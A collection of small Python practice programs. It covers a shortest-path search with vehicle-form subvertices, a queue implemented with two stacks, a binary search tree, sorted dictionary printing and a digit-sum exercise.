pqueue = queue.PriorityQueue()
# Each vertex is split into 3 subvertices. distance_to_vertex[i][0] is the distance to the wheel subvertex on the
# ith vertex, [i][1] is tank and [i][2] is hover
# O(V)
distance_to_vertex = [[inf, inf, inf] for _ in range(len(graph.vertex_properties))]
# Starts in wheel form so to be at the start in wheel form is 0 while being at the start in hover or tank form
# will be the transform cost
distance_to_vertex[start] = [0, transform_cost, transform_cost]
# O(V)
# This will store the time taken to traverse through the vertex in each of the 3 forms
distance_through_vertex = [[inf, inf, inf] for _ in range(len(graph.vertex_properties))]
# O(V)
visited = [[0,0,0] for _ in range(len(graph.vertex_properties))]
# O(V)
# This keeps track of what vertex and vehicle type (subvertex) is used to reach any vertex in each of its vehicle
# types. This stores specifically the vertex and vehicle type just before in the shortest path.
pred = [[(None, None),(None, None),(None, None)] for _ in range(len(graph.vertex_properties))]
pred[start] = [(0, 0), (0,0), (0,0)]
# Saves the time required to travel through each vertex in each vehicle type (subvertex)
# O(V)
for i in range(len(graph.vertex_properties)):
if graph.vertex_properties[i] == 0:
distance_through_vertex[i] = [crossing_time["wheel"]["plain"], crossing_time["tank"]["plain"],
crossing_time["hover"]["plain"]]
elif graph.vertex_properties[i] == 1:
distance_through_vertex[i] = [crossing_time["wheel"]["hill"], crossing_time["tank"]["hill"],
crossing_time["hover"]["hill"]]
else:
distance_through_vertex[i] = [crossing_time["wheel"]["swamp"], crossing_time["tank"]["swamp"],
crossing_time["hover"]["swamp"]]
# Pushes every subvertex onto priority queue
# O(V)
for i in range(len(distance_to_vertex)):
for j in range(len(distance_through_vertex[0])):
pqueue.put((distance_to_vertex[i][j], i, j))
# It runs through the priority queue until there is a path to reach the end vertex. The first path to the end vertex
# will be the shortest path
while not pqueue.empty() and visited[end] == [0,0,0]:
# (distance to get to vertex in a certain vehicle type, the vertex ID, the vehicle type at the beginning of
# iteration at the vertex)
curr_distance_to, curr_vertex_ID, subvertex = pqueue.get()
# If vertex has already been visited, ignore it. After it has been visited, the distance is locked in
if visited[curr_vertex_ID][subvertex] == 1:
continue
# if vertex has been updated after this version was pushed onto the priority queue then ignore it
if curr_distance_to != distance_to_vertex[curr_vertex_ID][subvertex]:
continue
visited[curr_vertex_ID][subvertex] = 1
# Keeps track of what vertices were changed and therefore have to be added into the priority queue again
relaxed_vertices = []
edge_index_in_relax_vertices = -1
# Runs through all the neighbours of the current vertex that has been popped off the priority queue
for edge_destination in graph.edge_list[curr_vertex_ID]:
edge_index_in_relax_vertices += 1
# bitlist to check if any of the subvertices have been relaxed
relaxed_vertices.append([edge_destination, 0, 0, 0])
# From the vehicle type which is represented through subvertex, the following code determines the distance
# to traverse through the current vertex in the vehicle type and reach the neighbouring vertex in a specific
# vehicle type.
# e.g. Current vertex ID = 3, subvertex = 0, neighbouring vertex ID = 4. The following code will determine
# how long it takes to get to vertex 4 in wheel form and finish in wheel form, how long it takes to reach
# vertex 4 in wheel form and finish in tank form (so has to transform once it reaches 4) and the same for
# hover form.
# To compute the distance, it looks at the distance to reach the current vertex in the vehicle form
# (subvertex), how long it takes to traverse the current vertex in the form and then adds the transform cost
# if the destination subvertex vehicle form is different to current vehicle form
if subvertex == 0:
# if the subvertex has already been finalised by being visited, it cannot be relaxed
if visited[edge_destination][0] == 0:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][0] + \
distance_to_vertex[curr_vertex_ID][0]
# If travelling through current vertex is a shorter path than previous path to next vertex then
# relax by updating distance, pred list and relaxed_vertices list
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][0]:
distance_to_vertex[edge_destination][0] = travel_through_current_vertex_to_next
pred[edge_destination][0] = (curr_vertex_ID, 0)
relaxed_vertices[edge_index_in_relax_vertices][1] = 1
if visited[edge_destination][1] == 0:
# If the destination is the end then it does not need to transform. Otherwise it should transform
# once reaching destination vertex
if edge_destination != end:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][0] + distance_to_vertex[curr_vertex_ID][0] + transform_cost
else:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][0] + \
distance_to_vertex[curr_vertex_ID][0]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][1]:
distance_to_vertex[edge_destination][1] = travel_through_current_vertex_to_next
pred[edge_destination][1] = (curr_vertex_ID, 0)
relaxed_vertices[edge_index_in_relax_vertices][2] = 1
if visited[edge_destination][2] == 0:
if edge_destination != end:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][0] + \
distance_to_vertex[curr_vertex_ID][
0] + transform_cost
else:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][0] + \
distance_to_vertex[curr_vertex_ID][0]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][2]:
distance_to_vertex[edge_destination][2] = travel_through_current_vertex_to_next
pred[edge_destination][2] = (curr_vertex_ID, 0)
relaxed_vertices[edge_index_in_relax_vertices][3] = 1
if subvertex == 1:
if visited[edge_destination][0] == 0:
# If travelling through current vertex is a shorter path than previous path to next vertex then relax
if edge_destination != end:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][1] + \
distance_to_vertex[curr_vertex_ID][1] + transform_cost
else:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][1] + \
distance_to_vertex[curr_vertex_ID][1]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][0]:
distance_to_vertex[edge_destination][0] = travel_through_current_vertex_to_next
pred[edge_destination][0] = (curr_vertex_ID, 1)
relaxed_vertices[edge_index_in_relax_vertices][1] = 1
if visited[edge_destination][1] == 0:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][1] + \
distance_to_vertex[curr_vertex_ID][1]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][1]:
distance_to_vertex[edge_destination][1] = travel_through_current_vertex_to_next
pred[edge_destination][1] = (curr_vertex_ID, 1)
relaxed_vertices[edge_index_in_relax_vertices][2] = 1
if visited[edge_destination][2] == 0:
if edge_destination != end:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][1] + \
distance_to_vertex[curr_vertex_ID][1] + transform_cost
else:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][1] + \
distance_to_vertex[curr_vertex_ID][1]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][2]:
distance_to_vertex[edge_destination][2] = travel_through_current_vertex_to_next
pred[edge_destination][2] = (curr_vertex_ID, 1)
relaxed_vertices[edge_index_in_relax_vertices][3] = 1
if subvertex == 2:
# distance from current subvertex to next subvertex is the distance to travel through current
# vertex as wheel + the distance to get to this vertex. Transforming before leaving current vertex. If at w subvertex
# and pred is not a wheel then transform first then make transition
if visited[edge_destination][0] == 0:
if edge_destination != end:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][2] + \
distance_to_vertex[curr_vertex_ID][2] + transform_cost
else:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][2] + \
distance_to_vertex[curr_vertex_ID][2]
# If travelling through current vertex is a shorter path than previous path to next vertex then relax
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][0]:
distance_to_vertex[edge_destination][0] = travel_through_current_vertex_to_next
pred[edge_destination][0] = (curr_vertex_ID, 2)
relaxed_vertices[edge_index_in_relax_vertices][1] = 1
if visited[edge_destination][1] == 0:
if edge_destination != end:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][2] + \
distance_to_vertex[curr_vertex_ID][2] + transform_cost
else:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][2] + \
distance_to_vertex[curr_vertex_ID][2]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][1]:
distance_to_vertex[edge_destination][1] = travel_through_current_vertex_to_next
pred[edge_destination][1] = (curr_vertex_ID, 2)
relaxed_vertices[edge_index_in_relax_vertices][2] = 1
if visited[edge_destination][2] == 0:
travel_through_current_vertex_to_next = distance_through_vertex[curr_vertex_ID][2] + \
distance_to_vertex[curr_vertex_ID][2]
if travel_through_current_vertex_to_next < distance_to_vertex[edge_destination][2]:
distance_to_vertex[edge_destination][2] = travel_through_current_vertex_to_next
pred[edge_destination][2] = (curr_vertex_ID, 2)
relaxed_vertices[edge_index_in_relax_vertices][3] = 1
# If vertexes have been relaxed, repush them into the pqueue
for i in range(edge_index_in_relax_vertices+1):
for j in range(1, 4):
if relaxed_vertices[i][j] == 1:
# O(logV)
# Push (distance to subvertex, vertex_id, subvertex_id) onto priority queue
pqueue.put((distance_to_vertex[relaxed_vertices[i][0]][j-1], relaxed_vertices[i][0], j-1))
# Determines which vehicle type (subvertex) has the shortest path to reach the end vertex
min_distance_index = 0
for x in range(1, len(distance_to_vertex[end])):
if distance_to_vertex[end][x] < distance_to_vertex[end][min_distance_index]:
min_distance_index = x
# res stores the shortest distance to reach the end vertex and then a list of tuples showing the path taken to reach
# the end vertex in the shortest path
res = [distance_to_vertex[end][min_distance_index], []]
# Stores the path back to front which will be reversed later
res_temp = []
# Converts subvertex IDs into string representing the vehicle type
str = index_to_vehicle_type(pred[end][min_distance_index][1])
res_temp.append((end, str))
# pred_vertex is the subvertex directly before the current subvertex in the path
pred_vertex = pred[end][min_distance_index]
# While loop goes backwards from the end vertex until it reaches the start vertex and appends the path to res_temp
# continues until the start vertex has been appended
while res_temp[-1][0] != start:
curr_vertex_ID, subvertex = pred_vertex
vehicle_type = index_to_vehicle_type(subvertex)
res_temp.append((curr_vertex_ID, vehicle_type))
pred_vertex = pred[curr_vertex_ID][subvertex]
# res_temp is in reverse order so this appends the path in the correct order to res to be returned
for i in range(len(res_temp)-1, -1, -1):
res[1].append(res_temp[i])
return res
def index_to_vehicle_type(index):
""" Given a subvertex index, it returns the string that represents the vehicle form for that subvertex
Time Complexity: O(1)
"""
if index == 0:
return "wheel"
if index == 1:
return "tank"
if index == 2:
return "hover"
|
165f5fca8fbbb15f7bc457355f8a9ee5bd37bddb | optionalg/crack-the-coding-interview | /queue-via-stacks.py | 2,122 | 4.0625 | 4 | class Stack(object):
def __init__(self):
self.stack = []
self.size = 0
def push(self, item):
self.stack.append(item)
self.size += 1
def pop(self):
if self.size == 0:
raise Exception('Stack is empty')
self.size -= 1
return self.stack.pop()
def peek(self):
if self.size == 0:
raise Exception('Stack is empty')
return self.stack[-1]
def is_empty(self):
return self.size == 0
class My_Queue(object):
def __init__(self):
self.original = Stack()
self.temp = Stack()
def __repr__(self):
return "Original: %s \nTemp: %s" % (self.original.stack,
self.temp.stack[::-1])
def enqueue(self, item):
if not self.temp.is_empty():
self.transfer_all(self.temp, self.original)
self.original.push(item)
def dequeue(self):
if self.is_empty():
raise Exception('Stack is empty')
if not self.original.is_empty():
self.transfer_all(self.original, self.temp)
return self.temp.pop()
def transfer_all(self, give, take):
while not give.is_empty():
item = give.pop()
take.push(item)
def is_empty(self):
return self.original.is_empty() and self.temp.is_empty()
###############################################################################
if __name__ == '__main__':
# Test Stack class
nums = Stack()
nums.push(1)
nums.push(2)
nums.push(3)
print nums.stack
nums.peek()
print nums.pop()
print nums.stack
print nums.is_empty()
print nums.pop()
print nums.pop()
print nums.is_empty()
print "\n", "=" * 10
# Test My_Queue class
more_nums = My_Queue()
more_nums.enqueue(1)
more_nums.enqueue(2)
more_nums.enqueue(3)
print "\n", more_nums, "\n"
print more_nums.dequeue()
print "\n", more_nums, "\n"
print more_nums.is_empty()
print more_nums.dequeue()
print more_nums.dequeue()
print more_nums.is_empty()
|
c66d2f77e6e6ed3af8b286f2815900e8f31daf9e | Loiser/homework-5 | /binsearch_tree.py | 3,997 | 3.78125 | 4 | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 15 18:48:05 2019
@author: 10539
"""
class Node:
def __init__(self,val):
self.val=val
self.left=None
self.right=None
class binsearch_tree:
def __init__ (self,val):
self.start=Node(val)
def search(self,val):
root= self.start
while root:
if val==root.val:return True
elif val<root.val:root=root.left
else:root=root.right
return False
def findMin(self, root):
if root.left:
return self.findMin(root.left)
else:
return root
def insert(self, root, val):
if root == None:
root = Node(val)
elif val < root.val:
root.left = self.insert(root.left, val)
elif val > root.val:
root.right = self.insert(root.right, val)
return root
def delete(self, root, val):
if root == None:
return
if val < root.val:
root.left = self.delete(root.left, val)
elif val > root.val:
root.right = self.delete(root.right, val)
else:
if root.left and root.right:
temp = self.findMin(root.right)
root.val = temp.val
root.right = self.delete(root.right, temp.val)
elif root.right == None and root.left == None:
root = None
elif root.right == None:
root = root.left
elif root.left == None:
root = root.right
return root
def pre_tran(self):
stack=[]
root=self.start
while root:
print(root.val)
if root.left!=None:
stack.append(root)
root=root.left
else:
if root.right!=None:
root=root.right
else:
if stack:
ll=stack[-1]
while stack and ll.right==None:
ll=stack[-1]
stack.pop()
root=ll.right
else:
break
def mid_tran(self,root):#开始的时候输入self.start
if root==None:
return
self.mid_tran(root.left)
print(root.val)
self.mid_tran(root.right)
def post_tran(self,root):
if root==None:
return
self.mid_tran(root.left)
self.mid_tran(root.right)
print(root.val)
def layer_tran(self):
if self.start== None:
return
queue = []
queue.append(self.start)
while queue:
currentNode = queue.pop(0)
print(currentNode.val, end=' ')
if currentNode.left:
queue.append(currentNode.left)
if currentNode.right:
queue.append(currentNode.right)
lala=binsearch_tree(8)
lala.insert(lala.start,1)
lala.insert(lala.start,88)
lala.insert(lala.start,6)
lala.insert(lala.start,4)
lala.layer_tran()
''' 从start开始,print ,left!=None->append root &root=root.left
left==None->if right!=None:root=root.right
if right==None:if stack:ll=stack[-1]
while stack and ll.right==None:
stack.pop()
ll=stack[-1]
if stack:stack.pop()&root=ll.right
'''
|
4039c6d924d837a7b7ebb979c6d8a149237be1f2 | joshuagato/learning-python | /DictionariesAndSets/Dictionaries2.py | 867 | 4.46875 | 4 | fruit = {
"orange": "a sweet, orange citrus fruit",
"apple": "good for making cider",
"lemon": "a sour, yellow citrus fruit",
"grape": "a small, sweet fruit growing in bunches",
"lime": "a sour, green citrus fruit"
}
print(fruit)
# ordered_keys = list(fruit.keys()) # Convert the dictionary keys into a list
# ordered_keys.sort() # Sort the items in the list
# for key in ordered_keys:
# print(key + " - " + fruit[key])
# print()
# This block of code performs the same functionality as the previous block
# ordered_keys = sorted(list(fruit.keys())) # Converts the dictionary keys into a list amd sorts the items in the list
# for key in ordered_keys:
# print(key + " - " + fruit[key])
# print()
# The previous two blocks of code refactored
for key in sorted(fruit.keys()):
print(key + " - " + fruit[key])
print()
|
cd9c81a362625ea79bf5f8298c25c2b2b42df28e | zzgsam/python_practic | /practice1.py | 402 | 3.9375 | 4 | #Write a program that asks the user for a number(Interger) and prints the sum of its digits
def ask_user():
num = input("Input a number")
print(type(num),num) #type() returns the type of a variable
#isinstance(a, int) returns true or false
sum=0
for num_add in num:
sum += int(num_add)
print("sum = %d" % sum)
pass
ask_user()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.